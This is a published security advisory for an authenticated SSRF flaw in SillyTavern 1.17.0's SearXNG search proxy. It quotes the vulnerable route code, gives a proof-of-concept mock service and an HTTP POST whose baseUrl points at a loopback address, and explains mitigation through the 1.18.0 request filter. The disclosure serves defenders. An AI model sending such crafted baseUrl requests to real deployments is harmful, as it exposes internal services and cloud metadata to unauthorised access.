High severity8.5GHSA Advisory· Published May 19, 2026

SillyTavern: SSRF in SearXNG Search Proxy via Unvalidated baseUrl

CVE-2026-46372

Description

Resolution

SillyTavern 1.18.0 added a generic server-side request filter (Private Request Whitelisting). Since we expect users to use the application in a trusted environment, the filter is disabled by default, however it is strongly advised to be enabled and properly configured when an instance is being hosted over a network, as suggested by a console warning message and an officially published security checklist for administrators.

Documentation:

https://docs.sillytavern.app/administration/config-yaml/#private-address-whitelisting
https://docs.sillytavern.app/administration/#security-checklist

Note on future

SSRF findings

Since the request filter applies to the entire application, no SSRF vulnerabilities against individual endpoints will be accepted, unless it has been proven that a properly configured and enabled filter can be bypassed in an undocumented way. Only advisories disclosed before the 1.18.0 release will be posted if their concern is SSRF.

Summary

SillyTavern 1.17.0 exposes /api/search/searxng, which accepts attacker-controlled baseUrl and uses it directly to build outbound server-side fetches. An authenticated low-privilege user can point baseUrl at an internal or loopback HTTP service and receive the /search response body.

Confirmed version: SillyTavern 1.17.0 from the audited source tree. Broader affected versions and patched versions should be confirmed by the maintainer.

Details

The /api/search/searxng route in src/endpoints/search.js reads baseUrl from request.body and performs no allowlist, IP range, DNS, or scheme validation before making outbound requests.

Core vulnerable path:

router.post('/searxng', async (request, response) => {
    const { baseUrl, query, preferences, categories } = request.body;
    if (!baseUrl || !query) {
        return response.status(400).send('Missing required parameters');
    }

    const mainPageUrl = new URL(baseUrl);
    const mainPageRequest = await fetch(mainPageUrl, { headers: visitHeaders });
    ...
    const searchUrl = new URL('/search', baseUrl);
    const searchParams = new URLSearchParams();
    searchParams.append('q', query);
    ...
    const searchResult = await fetch(searchUrl, { headers: visitHeaders });
    ...
    const data = await searchResult.text();
    return response.send(data);
});

src/server-startup.js mounts this router at /api/search, and src/server-main.js applies login middleware before the API routes. This means the source is a remote authenticated POST request and the sink is server-side fetch() to attacker-selected hosts.

PoC

Attacker prerequisites: a valid SillyTavern web session, or access to a deployment where user accounts are disabled.

Start an internal mock service on the target host:

import http from 'node:http';

http.createServer((req, res) => {
  if (req.url === '/') {
    res.writeHead(200, { 'Content-Type': 'text/html' });
    return res.end('');
  }
  if (req.url === '/client.css') {
    res.writeHead(200, { 'Content-Type': 'text/css' });
    return res.end('body{}');
  }
  if (req.url.startsWith('/search?q=')) {
    res.writeHead(200, { 'Content-Type': 'text/plain' });
    return res.end('INTERNAL-SEARCH-RESULT');
  }
  res.writeHead(404);
  res.end('not found');
}).listen(9091, '127.0.0.1');

Then send:

POST /api/search/searxng HTTP/1.1
Host: TARGET:8000
Cookie: session-...=...
X-CSRF-Token: 
Content-Type: application/json

{"baseUrl":"http://127.0.0.1:9091/","query":"x"}

Result based on the route logic: SillyTavern first fetches http://127.0.0.1:9091/, then fetches http://127.0.0.1:9091/search?q=x, and returns INTERNAL-SEARCH-RESULT to the attacker.

Impact

This is an authenticated SSRF primitive with arbitrary host and port selection. It can disclose responses from loopback or internal HTTP services reachable from the SillyTavern host and may enable interaction with internal admin panels, development services, cloud metadata endpoints in applicable deployments, or service discovery across private networks.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

SillyTavern 1.17.0 allows an authenticated low-privilege user to exploit SSRF via unvalidated `baseUrl` in the SearXNG search proxy endpoint.

Vulnerability

SillyTavern version 1.17.0 exposes the /api/search/searxng endpoint in src/endpoints/search.js. The route reads a baseUrl parameter from request.body and, after minimal presence checks for baseUrl and query, uses it directly to construct outbound HTTP requests via fetch(). The endpoint performs no validation against IP ranges, DNS, schemes, or an allowlist. This allows any authenticated user (including low-privilege users) to force the server to make HTTP requests to arbitrary destinations. The vulnerability is confirmed in version 1.17.0; the maintainers state that broader affected version ranges should be confirmed by them [1][2].

Exploitation

An attacker must have a valid account with any role on the SillyTavern server. From that authenticated session, they can send a POST request to /api/search/searxng with a crafted JSON body containing baseUrl (e.g., http://127.0.0.1:8080/internal) and a query parameter. The server will then make a fetch() call to the attacker-supplied URL and return the response body (specifically the /search page content) to the attacker [1][2]. No additional user interaction or race condition is required.

Impact

Successful exploitation allows an attacker to perform Server-Side Request Forgery (SSRF) against internal or loopback HTTP services. This can lead to information disclosure of internal resources, such as cloud metadata endpoints, internal APIs, or other services reachable only from the application server. The attacker receives the response content for the /search path of the target URL. The impact is limited to HTTP services that return a valid response; the attacker cannot directly control request methods or headers beyond those set by the application [1][2].

Mitigation

SillyTavern 1.18.0 introduced a generic server-side request filter (Private Request Whitelisting) that, when enabled and properly configured, blocks requests to private and loopback addresses. The filter is disabled by default. Administrators are strongly advised to enable and configure the filter when the instance is accessible over a network, as documented in the official security checklist and configuration guide [1][2]. No patched version that fixes the endpoint itself has been released; the mitigation relies on the new filter feature. If upgrading to 1.18.0 is not possible and the instance is exposed to untrusted users, the /api/search/searxng route should be disabled via a reverse proxy or the application should be kept on a trusted network only [1][2].

References

AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.

Affected products

Sillytavern/SillytavernGHSA2 versions
<= 1.17.0+ 1 more
- (no CPE)range: <= 1.17.0
- (no CPE)range: =1.17.0

Patches

No patches discovered yet.

Vulnerability mechanics

AI mechanics synthesis has not run for this CVE yet.

References

News mentions

No linked articles in our index yet.

cvss	0.455
epss	0.000
exploit	0.000
kev	0.000
patch	0.000
ransomware	0.000